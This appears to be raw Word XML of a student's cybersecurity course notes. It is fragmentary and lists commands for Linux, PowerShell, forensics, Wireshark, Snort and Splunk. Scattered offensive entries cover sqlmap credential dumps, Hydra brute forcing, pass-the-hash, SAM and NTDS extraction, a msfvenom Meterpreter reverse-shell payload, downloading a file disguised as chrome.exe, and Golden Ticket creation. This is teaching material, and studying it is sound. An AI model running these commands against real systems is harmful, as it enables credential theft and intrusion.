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49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="cente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Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">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1BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419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A0D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l – shows info on the dir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3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 – shows my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="0022779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r w:rsidR="00227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2A436388"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r w:rsidR="00D729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1 &gt; 60' – print only the lines where the first column bigger than 60</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 sort the ouput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niq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ic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 -l – count number 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ddwd – creating a directoy called ddwd</w:t>
      </w:r>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rd dddd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install cmatrix – install cmatrix package</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3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4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nhello'</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35A986D3"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r w:rsidR="00DC7E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hash rev.exe – calculate few hashes of PE files (exe, dll and more), the imphash, one of the hash results affected by the functionality of the file and not things as timestamp</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6"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R “hello” – search recursively in all the dir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Eo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ip (maybe its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pwd’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3C17F68D" w:rsid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tapn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planetu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6BDDE38F" w14:textId="08312CC6" w:rsidR="00DB08F6" w:rsidRPr="00E52D0A" w:rsidRDefault="00DB08F6"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lsof -i :800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 the process id (PID) of open port 800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kill -9 5907</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ose the port by killing the process (by PID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="25AE9E07" w:rsidR="002170DA" w:rsidRDefault="0034420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0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analyst.em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pecify the type of file</w:t>
      </w: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http.server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7"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kali’ ssh -o StrictHostKeyChecking=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8.8.8.8” -sV -oG /home/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run nmap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shpass -p "$ssh_pass" scp /home/kali/Try.sh "$ssh_user"@"$ssh_ip":/home/"$ssh_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c -lvp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ltproc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first_location/$name_of_di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gunzip rockyou.txt.gz – open gz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ere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erel”,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0FAC3F"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 harddisk.vmdk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walk -e harddisk.vmdk – extract files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B"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most harddisk.vmdk -T output – carve another type of file from binwalk tool, if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7"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_extractor</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pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156"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s </w:t>
      </w:r>
      <w:r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p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0"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 file.elf – extract data on the file such original name and more, it may possible to change this data when loading the file to HxD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sv photo.jpg &gt; extracted.csv – save the results to exce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 embed -ef a.txt -cf b.txt – cover the file a.txt behind b.txt, ef (embedded file), cf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indo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r loader.jar – a command to open the burpsuite (need to run from the burpsuit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xss attack’)&lt;/script&gt; - script you can insert into input box of a site to see if sql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xss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s – sql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qlmap -r ddd.txt -D dvwa -T users –dump – extract users and passwords from users table from DB called dvwa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to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b </w:t>
      </w:r>
      <w:hyperlink r:id="rId9"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l kali -p 1234 10.10.10.10 ssh – attack the ssh service on ip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ydra -l malware -p 1 rdp://10.10.10.10 – attack the rdp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 -h 10.10.10.10 -u msfadmin -P /home/kali/file.txt -M ftp – use the user msfadmin with the password file to try brute force on ftp service on ip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 -u “” -N 10.10.10.10  - try to connect to smb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pcclient -U “pentestme%Passw0rd\!” -c “queryuser Administrator” 10.10.10.10 – connect to ip 10.10.10.10 and run the command queryuser Administrator with the credentials pentestm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ueryuser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groups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users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36D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726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mapexec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main functions of him is PtH (pass the hash) and PtT (pass the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726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crackmapexec smb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sam – give us the sam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H ‘aasa…’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x ‘mkdir malware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="6CE5F6ED" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C197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 – flag for pass the has instead of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 ‘mkdir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 is used for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110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ds</w:t>
      </w:r>
      <w:r w:rsid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domain credentials from Active Directory domain controll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res – extract info on share directories</w:t>
      </w:r>
      <w:r w:rsidR="003872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rs – get info on us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 get data on the groups and the amount of users every group h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startup – choose specific group, then we will get more data on the startup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80AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E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secretsdump -sam SAM.hive -secuirty SECURITY.hive -system SYSTEM.hive local – t</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and extracts hashed passwords and  other sensitive security inform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uses the SYSTEM hive to decrypt the hashes found in the SAM hiv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also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>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 vsftpd – search all the exist exploits of vsftpd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sploit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022BE0B8" w14:textId="4D635649" w:rsidR="00295DAD" w:rsidRDefault="00295DAD"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mon.exe -i file.xm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mon.exe -i accepteula – both commands are necessary for installing Sysmon (log in event viewer) and use the configuration found in xm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mon.exe -c file.xml – for update the configuration (if you changed the xml file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="0069759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B8D3F"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527A"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949D8"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83BA5"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24835"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9236C"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90F7"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EDC1F"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7A12"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8ABD"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88C16"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B33EA"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B0436"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ECDE9"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latality commands in windows/linux</w:t>
      </w:r>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 this tool can be used in windows and linux,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volatality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exe -f memdump.mem imageinfo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memdump.mem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inxpsp2 pstree</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slist – print the procceses</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mftparser – shows all the mft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rintkey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connscan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onnections – shows all the connections that wa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mdline\dlllist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hivelist</w:t>
      </w:r>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dump2.mem –profile=vistasp1x86 hashdump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atality 3 – a lil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info – output profile, as imageinfo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pslist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netscan.NetScan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envas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filescan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dumpfiles --virtaddr 0x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBFBA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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8907D"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12FEF837" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="009A1A89"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w:t>
      </w:r>
      <w:r w:rsidR="0094127D"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27D">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bash – the first line in bash scip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e “1. Asdasd\n2. asdawd”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pwd)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if, you have to put fi in the end, you have to write then line after i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first_locatio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israel and use &amp;&amp; for two statemnets</w:t>
      </w:r>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heck_if_anonymous"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p – using whois tool to search about this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oiplookup $ip – using geoiplookup tool to search about this ip</w:t>
      </w:r>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2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07"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number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map $ip -s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nmap $ip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sac</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case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this case dunction, esac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10"/>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gt;/dev/null – will not print error, could use to hide logo tools (as volatality)</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basenam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date -d "$start_time"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1"/>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of the for loop is to take info on ip by using tools like nmap and masscan, by using &amp; in the end of the loop, it is does the scanning on all the ips in the list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to the ip variable and not search for ip_nmap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607" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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wershell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GridView</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ouput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measure – counts the items (similar to wc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Location – show my current location (similar to pwd)</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leHash .\.node_repl_history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commandtyp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ebrequest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lias cd – show the parallel command in powershell</w:t>
      </w:r>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TCPConnection</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UDPEndpoint</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 -Recurse | Get-FileHash -Algorithm MD5 | Out-GridView</w:t>
      </w:r>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Recurse -File -Filter "auth.log" | Select-Object Mode, LastWriteTime, Length, Name, Full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ullnam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tWriteTim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ort -Property cpu</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cpu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 sort by column cpu</w:t>
      </w:r>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lsass (by the column Process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Where-Object{$_.ProcessName -eq "lsass"} | Select-Object Name,Pat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lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2"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Group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DUser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 -Filter * | Where-Object { $_.SID.Valu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all the ADUsers its find the one with RID 501</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User -Filter * -Properties PasswordLastSet – shows the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D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Computer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inEvent -Path .\log.evtx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inEvent -Path .\log.evtx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p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e-Webrequest -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId12"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file c:\users\...\chrome.exe – ask from the ip 10.10.10.10 in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E"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with 8.8.8.8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e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p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E615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isplaying information directly to the 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t save info with that command into a variable or file</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E6152" w:rsidRPr="008F37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rite-Output – print the data, also enable us to save the info inside a file or variab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lo</w:t>
      </w:r>
      <w:r w:rsidR="000E6152" w:rsidRP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File "file.txt"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hello, and also save it into a fi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str /I hello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66"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Action SilentlyContinu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ag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48350E" w14:textId="312642C5" w:rsidR="00F43B9B" w:rsidRDefault="00F43B9B"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B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pri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get info about the user and its privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9888F" w14:textId="17D9412F" w:rsidR="002327B6" w:rsidRDefault="002327B6" w:rsidP="002327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7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save hklm\sam sam</w:t>
      </w:r>
      <w:r w:rsidR="007266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sam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327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save hklm\system system</w:t>
      </w:r>
      <w:r w:rsidR="007266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tate system file</w:t>
      </w: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sfconsole</w:t>
      </w:r>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6 – command line of msf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load – type of communication such as reverse_tcp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ype:auxiliary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exploit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post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rhost … - define the ip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exploit – run the sript</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g/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11CAF6EE"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hell to meterpreter type:post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ssion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hell_to_meterpreter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6BE12C36"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multi/handler – </w:t>
      </w:r>
      <w:r w:rsidR="002A76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asploit modul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er</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verse payloads to create session with you</w:t>
      </w:r>
      <w:r w:rsidR="004254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achine</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 7 – for choose the right option</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same payload you chose when created the file in msfvenom</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uid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pid – get the current process indentifier</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s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info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shdump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earev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grep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f accounts.txt – find a path to this file (similar to find command in linux)</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 save HKLM\sam c:\sam.hiv – save the file sam.hiv on the computer than you can download it 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ownload sam.hiv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amdump2 system.hiv sam.hiv -o secret_win – make hashdump from the files system.hiv and sam.hiv we downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="17566737"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venom --list payloads | grep meterpreter – give a list of meterpreter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msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=7878 -f exe </w:t>
      </w:r>
      <w:r w:rsidR="002735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002735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 – create payload and name it </w:t>
      </w:r>
      <w:r w:rsidR="006337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4.</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db init – create postgresql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vsftpd’  - behave as grep and search vsftp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_nmap 10.10.10.10 -p 21 -sV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b_export /path/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A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uxiliary/admin/smb/ms17_010_command – auxiliary for exploit smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA"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mmand “powershell Get-NetFirewallProfile” – when we want to run powershell command, we need first to write powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279651E6" w14:textId="1032A3A5" w:rsidR="00377343" w:rsidRDefault="00377343" w:rsidP="0037734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773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_log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list of users or user, and list of passwords or password as input, and brute force until find the right credentials for smb</w:t>
      </w:r>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 advfirewall</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ICMP_allow – shows data on the predefined rule called ICMP_allow</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add rule name = allow_server dir=in action=allow remoteip = 10.10.10.10 – allow incoming traffic from the ip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sh advfirewall firewall add rule name=accept_443 protocol=TCP dir=out localport=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set rule name=Allow_ICMP dir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953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E2328"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0BFE4"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627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61105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789"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 scans the default 1000 ports on the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n – does not use ping before scanning the ip, it assumes the destination exist, sometimes there are destinations that block ping, and the default for nmap is that when it does not find the host is active It won’t search for open ports so we want to use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V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n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rdp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vulners.nse</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sV for have the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the 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anon.ns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brute.nse</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smb-os-discovery – exploit the smb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ll nmap to run a default set of basic scripts of nmap for get info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8D174" w14:textId="0C6A00C2" w:rsidR="003D0295" w:rsidRDefault="003E0EA2"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p 80 -sS -Pn -n –disable-arp-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S send syn packet without completing the 3-way handshake</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lthier and faster than a full TCP conne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arp-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arp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ip for harden on the target to scan the real ip scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="2D6459CC" w:rsidR="00021236" w:rsidRDefault="0062373E"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UDP ports</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DP scans are usually slower</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UDP does not send back error messages when a port is closed, unlike TCP</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G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X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1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E"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 find os</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 – specify non standard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nmap "$ip" -sV -F | grep open | awk '{for (i=4; i&lt;=NF; i++) printf "%s ", $i;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masscan "$ip"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unch 7 7 -t lior^^^ &gt;&gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain lior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etc/shadow – try to crack the /etc/shadow file while using it default list of passwords called password.ls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etc/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2john crackme.rar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i locked.vmdk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026F"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BAD1"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65640"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D62E"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4EBB"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FC59EB3" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00C748A1">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d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r w:rsid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125AA" w:rsidRP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ase</w:t>
      </w:r>
      <w:r w:rsid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w:t>
      </w:r>
      <w:r w:rsidR="009125AA" w:rsidRP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ates that the content match should ignore case</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stablished,to_server</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es that this rule only applies to established connections heading toward the server</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_filter:track by_src, count 30, seconds 60</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 the number of matches to 30 within 60 seconds per source IP address, helping to reduce false positives or limit alert flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D5D26" w14:textId="3D0E90D5" w:rsidR="007804A1" w:rsidRDefault="007804A1" w:rsidP="007804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 pop a message in a case the rule found matc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rop – in addition to alert, it uses IPS (</w:t>
      </w:r>
      <w:r w:rsidRPr="007804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usion prevention syste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scard the packets so the receiver will not get the packets</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any (msg: “ICMP attempt attack”; sid:1000005) – alert us if the ip 10.10.10.10 from any port exist will talk to any ip in every port in icmp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3EFDA54B" w14:textId="77777777" w:rsidR="007804A1" w:rsidRDefault="00110024"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TCP 10.10.10.10/24 any -&gt; any any (content:”HTTP”; offset:4; depth:40; msg:”HTTP matched”;) – if there is tcp communication between every ip in10.10.10.10/24 in every port to any ip in any port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABF48C" w14:textId="1E2F01BB" w:rsidR="004B0D4A" w:rsidRPr="009C77E4" w:rsidRDefault="007804A1" w:rsidP="004B0D4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4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cp any any &gt; 172.16.100.20 22 (msg:"SSH Under Attack";flow:established,to_server; content:"SSH"; nocase; offset:0; depth:4; detection_filter:track by_src, count 30, seconds 60; sid:1000021; rev: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A6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t; - </w:t>
      </w:r>
      <w:r w:rsidR="001A6792" w:rsidRPr="001A6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ffic direction is inbound to the host or network specifi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list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 /? – shows all the options of taskkill command, like -h in linux</w:t>
      </w:r>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 – clear the cmd</w:t>
      </w:r>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CyberJunki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dns – show all the dns resolver cache, all the ip addresses the dns resolved and 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fig /release – return you ip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new ip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cert 8.8.8.8 – show all the path in the way to get to this ip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show current path, like pw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o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skkill /PID 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="5F8B6912" w:rsidR="00C4612C" w:rsidRDefault="00FF725F" w:rsidP="00B7251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b pic.jpg+sec.zip pic1.jpg </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de </w:t>
      </w:r>
      <w:r w:rsidR="00A04B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zip </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in </w:t>
      </w:r>
      <w:r w:rsidR="00CB46FF" w:rsidRP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anography</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 /r – for see files that hidden in ADS</w:t>
      </w:r>
      <w:r w:rsid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11" w:rsidRP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Data Streams</w:t>
      </w:r>
      <w:r w:rsid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paint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ink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DS</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dst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addr == 10.10.10.10 – search for packets with this ip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src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dst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addr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 == 5355 – scan for specific udp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port == 445 – scan for specific tcp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method == “GET” &amp;&amp; ip.src == 10.10.10.10 – filter for all the packets with get that specific ip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uri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flag.syn == 1 &amp;&amp; tcp.flag.ack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arp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B866"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1A1C"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CFAD"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21F5"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E357"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1C59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4A1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80BB"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 a CLI for wireshark,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hardening to find the right filter, you can use wireshark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I eth0 – capture packets (you cant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I eth0 -w class.pcap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display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of wireshark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 flag for the statistics of wireshark</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 shows the header of the framee</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cap.pcap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10.10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source ip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Y ‘http’ -T fields -e ‘ip.src’ – filter for http packets and get only their ip.src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export-objects http,files_http – extract the files that received in http protocol and save them inside files_http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Y “frame.number==161” -T fields -e tcp.dstport -e udp.dstport – search for frame 161 and print the destination tcp and udp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r net.pcap -z conv,ip – show the statistics of conversations, ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A"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T fields -e ‘eth.addr’ | sed ‘s/,/ /g’ | awk ‘{for(i=1; i&lt;=NF; i++) {print $i}}’ | sort | uniq | wc – shows all the eth.src and eth.dst in groups of eth.src,eth.dst, then the sed switch the , in space, and the awk make all the two columns to one column, and the sort uniq and wc count the uniqe ethernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4"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il passwords – search in the site Pastebin.com words in the conext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url – search inside url</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type – txt,csv, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6A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F6B0"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08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A36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253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7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253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Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253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reate golden ticket we need 3 </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omain Name</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SID</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KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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rbtgt account is a default service account i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rosof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y used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication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4511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5"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domain name we can use nmap to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 get SID we we can use 2 ways, but we need session to the machine for t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can run the command whoami /user and find the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we can use meterpreter session to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then use “dcsync_ntlm krbtgt”</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find in the output the SID, also the third thing we looked for, the NTLM has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by running the next command we can create the golden tick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acket-ticketer -nthash</w:t>
      </w:r>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main-sid </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 -domain … hack3r -dc-ip 10.10.10.10 – we need the insert the nthash we found, the SID we found, the name of the domain, the user</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to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</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ip of the DC</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84B8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D540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A5606"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5C4DE"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C36E5"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86E2A"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3D3BE"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15994"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F56C2"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49260"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1084"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1F01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72F47"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6835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ADEB9"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E678" w14:textId="77777777" w:rsidR="002B6D73" w:rsidRDefault="002B6D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1852D" w14:textId="04728A13" w:rsidR="004A630B" w:rsidRPr="002B6D73" w:rsidRDefault="00BA230E" w:rsidP="004A630B">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k</w:t>
      </w:r>
      <w:r w:rsidR="004A630B">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C978A" w14:textId="2B412FA2" w:rsidR="002B6D73" w:rsidRDefault="00AD4E61"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k – splunk is a good tool that enable us to collect logs from computers and organize it in one place</w:t>
      </w:r>
      <w:r w:rsidR="00B913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ing to elk, the free version of splunk is pretty limited, splunk more easier to install, splunk’s search is faster.</w:t>
      </w:r>
      <w:r w:rsidR="007159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plunk use SPL language (search processing language) for quries</w:t>
      </w:r>
      <w:r w:rsidR="007E69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s needed to install splunk on the main computer, and install the forwarder on the computers we want to collect the logs from, when installing the forwarder we need to choose the port and the ip the logs will sent into, and we need to choose which logs will sent (security, syste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8089 enable us to edit configurations on the forward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9997 forward all the data into splunk tool</w:t>
      </w:r>
      <w:r w:rsidR="00543B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B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can add data by choose files, or </w:t>
      </w:r>
      <w:r w:rsidR="009C35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the forward for other computers success to send data to the main machine</w:t>
      </w:r>
      <w:r w:rsidR="007E69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43B82" w:rsidRPr="00543B82">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147C8F" wp14:editId="3E839037">
            <wp:extent cx="1518138" cy="1641349"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="9969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5192" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1537117" cy="1661868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E00A1A" w14:textId="1FBF360C" w:rsidR="004A630B" w:rsidRDefault="009C3587"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87">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891EBD" wp14:editId="05254CB4">
            <wp:extent cx="5197365" cy="1547446"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="14726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8253" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248312" cy="1562615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E8A96" w14:textId="77777777" w:rsidR="00D3008E" w:rsidRDefault="00D3008E"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EA591" w14:textId="040F84A8" w:rsidR="00D3008E" w:rsidRDefault="008B628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puts – enable us to define which logs will save in splun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warding and receiving – we need to set here the receiver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926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 – enable us to create new index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A87F2A" w14:textId="0D99810A" w:rsidR="00D3008E" w:rsidRPr="004A630B" w:rsidRDefault="00D3008E"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08E">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4F8252A" wp14:editId="32F821FE">
            <wp:extent cx="2356338" cy="1774774"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="175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197" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2362923" cy="1779734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65736E75" w14:textId="7ABEA698" w:rsidR="00D3008E" w:rsidRDefault="0059796B"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search for certain logs by define the time we are interested and by quer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796B">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E01473" wp14:editId="0AFA423F">
            <wp:extent cx="5741002" cy="597877"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76816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3379" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5771411" cy="601044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A03D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03D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cess of rename field and advanced text manipulation</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need first to filter </w:t>
      </w:r>
      <w:r w:rsidR="003F154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all the logs we want to search in</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5A2C3" wp14:editId="43C98367">
            <wp:extent cx="3944815" cy="1260954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="715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2792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971617" cy="1269521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00542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54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open one of the logs, choose event actions, and extract fiel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1B66F5" wp14:editId="7C04320E">
            <wp:extent cx="3951250" cy="1840523"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="136289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1974" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3982397" cy="1855031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B51EE1" w14:textId="025EAF0D" w:rsidR="00396E02" w:rsidRDefault="00396E02"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choose which system, the common is delimeters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C282CCD" w14:textId="1A15D69E" w:rsidR="005E3C91" w:rsidRDefault="005E3C91"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D73CD8" wp14:editId="784E3659">
            <wp:extent cx="2919046" cy="1154826"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="101178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9390" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2987995" cy="1182103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C199C" w14:textId="4CB0B8DB" w:rsidR="00396E02" w:rsidRDefault="00396E02"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w:t>
      </w:r>
      <w:r w:rsidR="001350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how to separate each column, in our case space is the compatible char, then we can rename every field if we want</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 if we called field15 “attackerip”</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use this name in query:</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 | stats count by attackerip – combine and count all the duplicates ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C5B67" w14:textId="20BB5B1B" w:rsidR="002E305B" w:rsidRDefault="005E3C91"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B9DDF1" wp14:editId="1C260F6A">
            <wp:extent cx="5590728" cy="1266092"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="355191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1577" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5611486" cy="1270793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002E30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C74A8A" w14:textId="4623ED71" w:rsidR="002E305B" w:rsidRDefault="002E305B"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 choose which index to search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53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inlogs "eventcode=1102"</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by event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ead – search the first 10 lo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failed – search logs containing the word “failed” ignoring case sensitiv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dex=mylogs failed 192.168.17.24 – search logs containing </w:t>
      </w:r>
